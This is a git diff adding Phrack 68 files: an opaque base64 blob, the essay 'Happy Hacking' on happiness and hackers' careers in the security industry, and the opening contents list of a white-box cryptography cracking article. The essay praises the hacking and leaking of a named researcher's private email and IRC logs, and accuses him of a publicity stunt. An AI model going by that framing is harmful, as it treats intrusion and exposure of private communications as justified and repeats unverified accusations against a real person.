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
+====
+<-->
+
+--[ EOF
diff --git a/phrack68/7.txt b/phrack68/7.txt
new file mode 100644
index 0000000..29d033d
--- /dev/null
+++ b/phrack68/7.txt
@@ -0,0 +1,396 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x07 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[ Happy Hacking ]=---------------------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ by Anonymous ]=---------------------------=|
+|=-----------------------------------------------------------------------=|
+
+                                  -------
+
+1. Introduction
+
+2. The Happiness Hypothesis
+
+3. The consulting industry
+
+4. Rebirth
+
+5. Conclusions
+
+6. References
+
+                                  -------
+
+--[ 1 - Introduction
+
+I've been fascinated with happiness since my college days. Prior to 1998
+psychology focused on fixing people who had problems in an attempt to make
+them more "normal". However, recent trends in psychology have brought a
+whole new field called positive psychology. Positive psychology, or the
+science of Happiness, brings a wealth of research on how normal people can
+achieve greater levels of happiness. As you delve into the subject you will
+discover that most of the conclusions associated with the research into the
+topic of happiness actually runs counter to the popular culture
+understanding of what brings happiness.
+
+In this article I'd like to expose some ideas that directly impact the
+hacking scene and specifically as it relates to working in the security
+industry. I'd also like to introduce the idea of hacking happiness.
+
+If you could spend a percentage of your time learning about happiness, how
+much happier do you think you could be? Hacking happiness means cutting the
+path to happiness straight to what makes you happy by researching happiness
+just like you would any security topic.
+
+Since the article is focused on Happiness as it relates to hacking, there
+are many subjects of positive psychology that we are not going to touch or
+mention. However, if you are interested in reading more about the field,
+Wikipedia has an excellent article on the subject:
+
+  - http://en.wikipedia.org/wiki/Positive_psychology
+
+
+--[ 2 - The Happiness Hypothesis
+
+Most of the ideas introduced by this article are borrowed from "The
+Happiness Hypothesis" by Jonathan Haidt, which I recommend if you'd like to
+dig deeper into the subject.
+
+The first thing about happiness that you should know that research has
+proved is:
+
+  - "People are very bad at predicting what will bring them happiness." -
+
+To expose this idea let me provide an example. Researchers took a look at 2
+different groups of people that had been through completely opposite
+situations, the first group are lottery winners, and the second group are
+people that became paraplegics through some type of accident. Both groups
+were interviewed at 2 different times, once just after the event (winning
+the lottery or becoming paraplegic), and once more again several years
+later. The results of their interviews are quite astonishing.
+
+The first group, the lottery winners, as you might expect, had very high
+happiness levels when interviewed shortly after they had won the lottery.
+The second group, those who were newly paralyzed had a very low level of
+happiness, some were even so unhappy that they regretted not dying during
+the accident. These findings are quite obvious and shouldn't be surprising
+to you; however what is astonishing are the results of the second
+interview.
+
+Years later, the lottery winners were interviewed again, this time the
+results were quite surprising. As it turns out, their happiness level had
+dropped significantly to levels so low that most of the winners where more
+unhappy now than before winning the lottery. In contrast, the happiness of
+the group of paraplegics was very high, equal to or higher than before the
+accident. So what really happened?
+
+To explain this, let me describe the circumstances of the lottery winners.
+Having won the lottery, they thought they had achieved everything they
+wanted, since popular culture equates happiness with material wealth, and
+so their short term happiness level grew quite high. After some time
+though, they started to realize that the money wasn't bringing them the
+happiness they once thought they would achieve when they would be rich.
+Frustrated at the possibility that they would never be able to achieve full
+happiness, their happiness level started dropping. To try to compensate for
+their decreasing happiness level, they started spending money on material
+things, but that was no longer a happiness source. Further exacerbating the
+problem, this new wealth brought new problems (to quote Notorious B.I.G. -
+"Mo money mo problems"). Now family, friends and colleagues were regarded
+as a threat, thinking that all they wanted is to take advantage of their
+new wealth. People around them started asking for loans and favors, which
+led them to distant themselves from their families and friends. Again, in
+order to compensate, they started trying to make new friends that had their
+own wealth status. But breaking the bonds with old friends and family that
+had been established for most of their lives and trying to establish new
+ones, brought a feeling of loneliness that directly correlates to their
+happiness levels significantly dropping.
+
+On the other hand those who had become paraplegics relied heavily on their
+families and friends to help them through the rough times, thus 
+strengthening the bonds between them. And just like the lottery winners,
+the new circumstances brought back old friends from the past. But unlike
+with lottery winners who's friends came back looking to take advantage of
+their new wealth, these old friends came back for the opposite; they sought
+to help. Another factor associated with the increased happiness was the 
+fact that the group that was paralyzed had to learn to cope with being 
+paraplegics. Learning to cope with being paraplegics brought an immense
+sense of achievement that made their happiness levels go up.  After a few
+years their family relations were stronger than ever; friends were closer
+and their sense of achievement from having overcome their limitations had
+brought them an immense amount of happiness that, when compared to their 
+happiness levels before the accident, was equal and most of the times 
+higher.
+
+If someone were to ask you whether you would choose to become paraplegic or
+win the lottery, it is obvious that everyone would choose to win the
+lottery; however this choice goes against research which has shown that by
+becoming a paraplegic you would ultimately be happier.
+
+Obviously I am not saying this is the path you need to choose (if you are
+thinking of doing this, please stop!). I am merely trying to demonstrate
+that the actual road to happiness may force you to look at things in a very
+different and counter intuitive manner.
+
+
+--[ 3 - The Security Industry
+
+In recent years I've seen how many hackers join the information security
+industry and many of them having the illusion that hacking as their day job
+will bring them a great deal of happiness. After a couple of years they
+discover they no longer enjoy hacking, that those feelings they used to
+have in the old days are no longer there, and they decide to blame the
+hacking scene, often condemning it as "being dead".
+
+I'll try to explain this behavior from the science of happiness point of
+view.
+
+Let me start by looking at Journalism. The science of happiness has shown
+that people are happy in a profession where:
+
+  - "Doing good (high quality work) matches with doing well (achieving 
+    wealth and professional advancement) in the field." -
+
+Journalism is one of those careers where doing good (making the world
+better by promoting democracy and free press) doesn't usually lead to
+rising as a journalist. Julian Assange, the chief editor of Wikileaks, is
+a pretty obvious example of this. By firmly believing in free press he has
+brought upon himself a great deal of trouble. In contrast, being
+manipulative and exaggerating news often leads to selling more news, which
+in turn allows for the sales of more ads, which correlates to doing well.
+But by doing so, journalists have to compromise their beliefs, which
+ultimately makes their happiness levels go down. Those who decide not to
+compromise feel angry at their profession when they see those who cheat and
+compromise rise high. This feeling also leads to their happiness levels to
+drop. Journalism is therefore one of those professions where its
+practitioners tend to be the most unhappy.
+
+Hacking on the other hand doesn't suffer from this issue. In the hacking
+scene doing great work is often recognized and admired. Those hackers that
+are able to write that exploit thought to be impossible, or find that
+unbelievably complex vulnerability, are recognized and praised by the
+community. Also, many hackers tend to develop great tools which are often
+released as open source. The open source community shares a lot of
+properties with the hacking community. It is not hard to see why people
+enjoy developing open source projects so much. Most open source projects
+are community organizations lead by meritocracy; where the best programmers
+can quickly escalate the ranks by writing great code. Furthermore, the idea
+of making the code and the underlying designs widely available gives
+participants a feeling of fulfillment as they are not doing this for profit
+but to contribute to a better world. These ideals have also been an
+integral part of the hacking community where one of its mottos is,
+"Knowledge should be free, information should be free". Being part of such
+communities brings a wealth of happiness, and is the reason why these
+communities flourished without the need for any economic incentives.
+
+Recent years however have brought the security industry closer to the 
+hacking industry. Many hacking scene members have become security industry
+members once their responsibilities demanded more money (e.g. married with
+kids and a mortgage). For them it seemed like the right fit and the perfect
+job was to hack for a living.
+
+However, the security industry does not have the same properties as the
+hacking or open source communities. The security industry is much more like
+the journalism industry.
+
+The main difference between the hacking community and the security industry
+is about the consumers of the security industry. While in the hacking
+community the consumers are hackers themselves, in the security industry
+the consumers are companies and other entities that don't have the same
+behavior as hackers. The behavior of the security industry consumers is
+similar to the behavior of the consumers of journalism. This is because
+these companies are partially a subset of the consumers of journalism.
+These consumers do not judge work as hackers do; instead they are more
+ignorant and have a different set of criteria to judge work quality.
+
+It is because of this, that once a hacker joins the security industry they
+eventually discover that doing great work no longer means becoming a better
+security professional. They quickly start discovering a whole new set of
+rules to achieve what is considered to be the 'optimal', such as getting
+various industry certifications (CISSP, etc), over-hyping their research
+and its impact to generate press coverage, and often having to compromise
+their ideals in order to protect their source of income (for example the 
+"no more free bugs", "no more free techniques" movements).
+
+Those deciding that they don't want to be a part of this quickly realize
+that the ones who do are the ones that rise up. Most of them try to fix the
+situation by calling these people out, which often makes the person being
+called out likely criticized by the hacking community. But that is often 
+not the case within the security industry were they still enjoy a great 
+deal of success.
+
+To illustrate further, it has become very prevalent to announce discoveries
+and claim that by making the vulnerability details public catastrophic
+consequences would ensue, as we'll see in the example below. Most of the
+hacking community are quick to criticize this behavior, often ostracizing
+the person making the claim, and in a few cases hacking them in an
+attempt to publicly expose them. However, this practice only has an impact
+within the hacking community. In the security industry an opposite effect
+happens and the person in question achieves a higher status that allows
+him to present in the top security industry conferences. This person is
+also praised for choosing to responsibly disclose the vulnerability thus
+obtaining an overall security status of guru.
+
+To illustrate this let's look at a real world example. On July 28, 2009, 
+during the Las Vegas based Black Hat Briefings industry conference, the
+ZF05 ezine was released. The ezine featured a number of well respected
+security researchers and how they were hacked. But one of these researchers
+stood out, namely Dan Kaminsky. The reason why he stood out was that one
+year before, a couple of months before Black Hat Briefings, Dan Kaminsky
+decided to announce that he had a critical bug on how DNS servers
+operated [0].
+
+Moreover he announced that he had decided, for the benefit of Internet
+security, to release the technical details only during his Black Hat
+Briefings speech that year. The response to this decision was very
+polarized. On one side there was the "vendor" and information security
+industry that praised Dan for following responsible disclosure. On the
+other hand, some of the more prominent security people, criticized this
+approach [1].
+
+Dan in turn positioned himself as a martyr, stating that everyone was going
+against him, but he was willing to sacrifice himself in order to protect
+the Internet.
+
+When ZF05 was released, Dan Kaminsky's email spool and IRC logs were
+published in it. The released data included a number of emails he exchanged
+during the time he released the DNS bug. The emails showed exactly what
+everyone in the hacking community already knew; that Dan Kaminsky was
+anything but a martyr, and that everything was a large publicity stunt [2].
+
+Even though the data were completely embarrassing and publicly exposed Dan
+Kaminsky for what he really was, a master at handling the press, this had
+no impact outside of the hacking community. That year, again, Dan Kaminsky
+took a stand in the Black Hat Briefings conference to deliver a talk, and
+was again praised. He was also later chosen to be the American
+representative who holds the backups of the global DNS root keys [3].
+
+This demonstrates that no matter how severe a security industry figure gets
+owned by hackers literally (e.g. publishing their email spools and IRC 
+logs) or figuratively (e.g. showing qualitative evidence that their
+research is flawed, stolen, inaccurate or simply unoriginal), these
+individuals continue to enjoy a great deal of respect from the security
+industry. To quote Paris Hilton, "There's no such thing as bad press".
+
+With time those that choose not to compromise either live an unhappy life
+frustrated by these so called "hackers" that get their recognition from the
+security industry while they themselves are seen as security consultants 
+who just can't market themselves, or they simply choose to change their 
+entire career, often burned out and proclaiming that hacking is dead.
+
+
+--[ 4 - Rebirth
+
+Since the idea behind this paper is not to expose anyone, or complain about
+the security industry, we want to leave this aside and move on to what
+exactly a hacker can do to hack happiness.
+
+The rebirth section is then a logical reasoning exercise on the different
+paths that are available to a hacker who is also part of the information 
+security consulting community, as seen from the happiness maximization 
+perspective.
+
+The first path is to keep fighting. This path is quite popular; over the
+years we have seen many hackers forming groups and follow this path (el8,
+h0n0, Zero for 0wned, project m4yh3m, etc). But don't get too excited since
+most of the teams that follow this path eventually disintegrate; I'll try
+to explain the reasons why this happens. First, remember that humans are
+very bad at predicting what would bring them happiness. With that in mind,
+most of these groups form with the ideal of exerting a big change onto the
+security community. The problem with this approach is that they really have
+no control over the consumers of the industry, which is exactly where the
+problem really is. As these groups try to exert a change they quickly
+discover that even when their actions lead to undeniable proof of their
+arguments and are completely convincing to other hackers, they don't seem
+to affect regular people. Their initial victories and support from the
+hacking community will bring them a new wave of happiness, but as time goes
+frustration from not being able to have an impact beyond the hacker
+community will then start to build up, which leads to their level of
+happiness to drop, eventually disintegrating the group. You would be wise,
+if you are thinking of taking this path not to take my word for it, but 
+just look at the history of the groups that precede you, and then decide.
+
+Your other path is simply to ignore all of this and just keep working on
+the sidelines as a security consultant. As someone who was once part of the
+security industry - being on the sidelines without compromising my ideals
+while I saw others which had little skills rise - I can honestly tell you 
+it will make you sick. For some people, professional success is a very
+important part of their overall happiness. So if you choose to follow this
+path first make sure that professional success is not a very important part
+of your life. If that is the case, instead focus on other activities from
+which you can derive happiness. One great choice is participating in open
+source projects, or building one yourself. There are of course many other
+alternatives like family, sports etc, all of which can bring you immense
+happiness. On the other hand, if your personality is that of someone very
+ambitious, following this path will make you very unhappy for obvious
+reasons.
+
+Finally there is one more path. Simply accepting this is how the security
+industry works (these are the rules of the game), and playing the game. In
+this scenario, as you begin to rise you will discover that in order to
+move higher you are going to have to make some ethical compromises, and by
+doing so to rise up in the information security industry. Unfortunately,
+even though your professional success will bring some happiness with it,
+you will start to feel as if you sold your "soul" to the devil. This
+feeling will start bringing your happiness levels down, and the more you 
+compromise the bigger impact this will have. At the same time, you will 
+start hating your job for forcing you to compromise your ideals. This in 
+effect will cause your professional success to no longer bring you any 
+happiness. The combination of both hating your job and compromising your 
+ideals will bring your happiness levels very low. Eventually you will
+falsely reach the conclusion that you no longer like hacking, that hacking
+is dead, and this is why you feel so unhappy.
+
+Fortunately for you, the security industry is not the only option. Your
+skills and intelligence will be valued in different industries. It is up to
+you to decide what kind of career you would like to pursue. Many hackers 
+choose to work as software engineers, which is a very good option since 
+they already poses a great deal of knowledge in this area. But you are not 
+restricted to the software engineering industry. In fact I've seen cases 
+were hackers have chosen careers that have nothing to do with computing,
+far away actually, such as music or art, and they are quite successful and 
+happy.
+
+This does not mean you are giving up on hacking; in fact it is quite the
+opposite. Many people, including myself, do hacking as a hobby and choose
+to participate in a different industry for our living income. If you choose
+this path you will realize that as being part of this community will bring 
+you a lot of happiness. Deep inside you already know this if you are 
+reading this article. The real reason you started hacking in the first 
+place was not because you were good at it, or because you liked computers;
+it was because it made you happy and there is no reason why this has to
+change.
+
+For those of you that have been in the security industry for a while, which
+are unhappy with the current situation and are blaming the hacking 
+community for this, don't. Understand that it is not the hacking community 
+which has problems but the security industry and that once you start 
+hacking as a hobby again those feelings you once had will come back.
+
+
+--[ 5 - Conclusions
+
+I hope I brought some understanding to what makes people happier, what you
+should look into any industry you seek to work in if you want to maximize
+your happiness, and more importantly how the security industry behaves. 
+
+Hopefully some of you will be able to make better decisions, and ultimately
+the conclusion should be:
+
+  - Hacking will never die, because ultimately we all want happiness, and
+    hacking brings happiness. -
+
+HAPPY HACKING!
+
+
+--[ 6 - References
+
+[0] http://dankaminsky.com/2008/07/09/an-astonishing-collaboration/
+[1] https://lists.immunityinc.com/pipermail/dailydave/2008-July/005177.html
+[2] http://attrition.org/misc/ee/zf05.txt
+[3] http://www.root-dnssec.org/tcr/selection-2010/
+
+
+--[ EOF
diff --git a/phrack68/8.txt b/phrack68/8.txt
new file mode 100644
index 0000000..58d6fa7
--- /dev/null
+++ b/phrack68/8.txt
@@ -0,0 +1,3028 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x08 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=--------=[ Practical cracking of white-box implementations  ]=---------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[ by SysK - whiteb0x [o] phrack o org ]=---------------=|
+|=-----------------------------------------------------------------------=|
+
+
+                                  -------
+
+  1 - Introduction
+
+  2 - What is a WB implementation?
+
+  3 - The things you should know about white-boxes
+    3.1 - Products available
